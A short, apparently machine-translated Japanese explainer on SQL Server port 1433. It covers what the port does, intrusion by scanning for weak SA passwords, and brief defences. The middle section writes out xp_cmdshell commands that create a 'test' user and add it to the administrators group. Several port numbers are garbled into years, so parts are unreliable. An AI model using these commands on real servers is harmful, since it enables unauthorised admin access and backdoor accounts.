まず、1433
TCP-1433、UDP-1434:1433ポートはデフォルトのポートSQL Serverです、SQL Serverサービスは、2つのポートを使用しています。SQL Serverの1433年に使用されている依頼者にTCP / IPポートを使用してSQL Serverの1434年を返すためのサービスを提供しています。
第二に、1433年の侵略
共通ポート1433侵入、MSSQLサービスのつまり侵略、ユーザーは、SAの弱いパスワードのスキャンです。
SAは最高の権威をもって、それが拡張ストアドプロシージャを実行すると、このようなの実装などの戻り値を取得することができ、マイクロソフトSQLServerの管理者アカウントであります:
exec master..xp_cmdshell 'net user test 12345 /add'和exec master..xp_cmd
shell 'net localgroup administrators test /add'このようなの他のシステムは、テストという名前のユーザーを追加するコードは、ユーザーが管理者権限を持っている、12345ですました。
第三に、1433年の防衛
:ここでは、を参照してくださいhttps://wenku.baidu.com/view/43d7676a25c52cc58bd6beab.html
ポート1433をオフ1.電源を入れます。
2. [設定のセキュリティポリシー。
